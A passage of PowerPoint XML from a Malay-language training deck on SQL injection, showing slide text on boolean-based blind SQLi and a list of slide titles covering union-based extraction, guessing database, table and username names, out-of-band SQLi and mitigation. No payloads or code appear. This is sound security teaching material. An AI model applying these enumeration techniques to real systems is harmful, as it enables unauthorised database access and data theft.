              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> Boolean Based?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Serangan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ini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berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> kerana developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>telah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tingkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>dengan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cara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mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> block error message yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>keluar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apabila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berlaku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sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Disebabkan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itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> database vuln </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>untuk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sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>tidak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dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> error message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Bagaimanakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" u="sng" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Untuk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serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>penyerang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akan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menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>(evaluating) results </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> various queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> return TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> FALSE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-MY" sz="1900" dirty="0">
              <a:latin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C10007-D56B-4C9A-8E74-E51D23F831D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618187" y="1133341"/>
            <a:ext cx="10650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114208-DEAA-43B0-9ED3-3A4FD943EAC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10560677" y="6323527"/>
            <a:ext cx="14166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Ubuntu"/>
              </a:rPr>
              <a:t>DFM_Rekrut</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="15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2947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1784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charter</vt:lpstr>
      <vt:lpstr>Ubuntu</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>SQL Injection </vt:lpstr>
      <vt:lpstr>Apakah Itu SQL injection (SQLi)?</vt:lpstr>
      <vt:lpstr>Jenis-Jenis SQLi</vt:lpstr>
      <vt:lpstr>Cara Mencari SQLi vulnerabilities</vt:lpstr>
      <vt:lpstr>In Band SQLi [Union-Based]</vt:lpstr>
      <vt:lpstr>Bagaimanakah cara untuk check column di dalam table query?</vt:lpstr>
      <vt:lpstr>Cara Mencari columns yang mengandungi data</vt:lpstr>
      <vt:lpstr>Extract information</vt:lpstr>
      <vt:lpstr>Blind SQLi [Boolean Based]</vt:lpstr>
      <vt:lpstr>Checking Vuln Untuk Injection</vt:lpstr>
      <vt:lpstr>Checking for Panjang Database(Database String)</vt:lpstr>
      <vt:lpstr>Guessing Database name</vt:lpstr>
      <vt:lpstr>Guessing Table Name and String Length</vt:lpstr>
      <vt:lpstr>Guessing column username daripada table</vt:lpstr>
      <vt:lpstr>Out-of-Band SQLi</vt:lpstr>
      <vt:lpstr>Cara Mengatasi Serangan SQL Injection</vt:lpstr>
      <vt:lpstr>Rujukan</vt:lpstr>
      <vt:lpstr>SESI PRAKTIKAL &amp; LIVE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Muhd Syirazi</dc:creator>
  <cp:lastModifiedBy>Muhd Syirazi</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-23T21:44:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-26T17:27:12Z</dcterms:modified>
</cp:coreProperties>
</file>